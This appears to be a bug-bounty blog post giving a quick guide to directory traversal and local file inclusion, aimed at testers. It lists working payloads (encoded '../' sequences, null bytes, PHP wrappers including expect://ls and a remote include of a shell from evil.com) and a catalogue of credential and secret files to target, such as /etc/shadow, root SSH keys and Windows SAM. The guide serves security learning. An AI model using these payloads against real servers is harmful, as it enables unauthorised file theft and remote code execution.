RatSec

RatSec Blog

Directory Traversal, Quick Guide

- Posted in Bug bounties by

enter image description here

Directory traversal, also known as path traversal, is a type of vulnerability that allows an attacker to access files and directories that are outside of the intended directory structure. This can lead to unauthorized access to sensitive data or even remote code execution.

  • Understanding the vulnerability: Directory traversal vulnerabilities occur when user input is not properly sanitized or validated, allowing an attacker to include special characters (such as "../") in the input to move outside of the intended directory. For example, consider a web application that allows users to upload files to a specific directory. If the application does not properly validate the file path, an attacker could upload a file to a different directory on the server, potentially gaining access to sensitive data.

  • Identifying directory traversal vulnerabilities: To identify directory traversal vulnerabilities, you can use a variety of tools and techniques. One common technique is to use a fuzzer to test for different input variations, including special characters and directory traversal patterns. You can also manually test for directory traversal vulnerabilities by attempting to access files outside of the intended directory structure.

Here are some specific techniques you can use to identify directory traversal vulnerabilities:

Test for different input variations, including special characters and directory traversal patterns.
Test for different file extensions, as some applications may only allow   certain file types to be uploaded.
Test for different file paths, including absolute and relative paths.
Test for different encoding schemes, such as URL encoding or base64 encoding.
Test for different user roles, as some applications may only allow certain users to upload files.

Remember to switchup payloads.

  • Exploiting directory traversal vulnerabilities: Once you have identified a directory traversal vulnerability, you can attempt to exploit it by crafting a payload that includes directory traversal characters. For example, if the vulnerable application allows you to specify a file path for file uploads, you could attempt to upload a file to a different directory by including "../" in the file path.

The payload will depend on the specific application and vulnerability, but here are some general techniques you can use:

Use "../" to move up one directory level for each occurrence.
Use "/" to move to the root directory.
Use "%2e%2e%2f" to URL-encode "../".
Use "%2f" to URL-encode "/".
Use "%00" to include a null byte, which can be used to terminate a string early.

Here are some examples of directory traversal payloads:

"../../../../etc/passwd"
"/etc/passwd"
"%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
"%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
 "../../../../etc/passwd%00"

Using PHP Wrapping:

/example1.php?page=expect://ls
/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
/example.com/index.php?page=http://evil.com/shell.txt

Useful LFI Files

Linux

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/$USER/.ssh/authorized_keys
/home/$USER/.ssh/id_rsa
/proc/[0-9]*/fd/[0-9]*
/proc/mounts
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db

Apache

/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
/var/log/httpd/access_log(Red Hat/CentOS/Fedora Linux)
/var/log/apache2/access.log(Ubuntu)
/var/log/httpd-access.log(FreeBSD)
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log

MySQL

/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI

Windows

/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml
/windows/system32/license.rtf
/windows/system32/eula.txt

Remember to use your skills responsbily & only practise on sites you have permission to.

You can practise here on our labs: LFI Labs